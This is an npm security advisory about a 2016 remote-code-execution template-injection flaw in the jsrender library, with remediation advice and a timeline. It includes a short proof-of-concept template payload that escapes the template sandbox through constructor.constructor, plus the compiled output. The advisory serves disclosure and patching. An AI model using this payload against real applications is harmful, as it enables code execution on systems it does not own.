Noncollinear Perpendicular Microcrystalline

npm

Severity: critical

Template Injection

jsrender

Overview

Affected versions of jsrender are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.

Proof of Concept

<POC-REQUEST>
{{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}}
{{:#data}}
{{/for}}
</POC-REQUEST>
<POC-RESPONSE>
function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; } 
<POC-RESPONSE>

Remediation

Update to version 0.9.74 or later.

Resources

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Mar 30th, 2016
  2. reported

    Initial report by Paweł Hałdrzyński
    Mar 30th, 2016